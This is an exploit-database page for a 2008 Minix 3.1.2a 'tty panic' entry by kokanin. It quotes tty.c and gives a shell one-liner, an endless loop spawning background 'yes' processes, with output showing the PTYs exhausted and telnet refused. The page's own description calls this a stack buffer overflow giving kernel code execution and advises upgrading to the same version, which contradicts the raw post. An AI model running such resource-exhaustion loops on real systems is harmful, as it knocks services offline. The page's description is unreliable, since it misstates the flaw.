header-logo
Suggest Exploit
vendor:
Minix 3.1.2a
by:
kokanin
7.8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Minix 3.1.2a
Affected Version From: 3.1.2a
Affected Version To: 3.1.2a
Patch Exists: YES
Related CWE: N/A
CPE: o:minix:minix_3.1.2a
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: i686
2008

minix 3.1.2a tty panic

A buffer overflow vulnerability exists in Minix 3.1.2a due to improper bounds checking of the tty_reply() function in trunk/src/drivers/tty/tty.c. An attacker can send a specially crafted message to the tty_reply() function, resulting in a stack-based buffer overflow. This can be exploited to execute arbitrary code with kernel privileges.

Mitigation:

Upgrade to the latest version of Minix 3.1.2a
Source

Exploit-DB raw data:

# kokanin@gmail 20080723
# minix 3.1.2a tty panic

trunk/src/drivers/tty/tty.c

 14965	  if ((status = send(replyee, &tty_mess)) != OK) {
 14966	        panic("TTY","tty_reply failed, status\n", status);

$ uname -a
Minix 192.168.1.2 3 1.2a i686
$ while true ; do (yes "yes yes minix uh ah"&) ; done
[snip snip]
$ ^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C

...disconnected

telnet 192.168.1.2
Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.
I am sorry, but there is no free PTY left!
Connection closed by foreign host.

hai, no moar pty, kthxbye
--
kokanin

# milw0rm.com [2008-07-23]

Navigation

Suggest Exploit

Services By CQR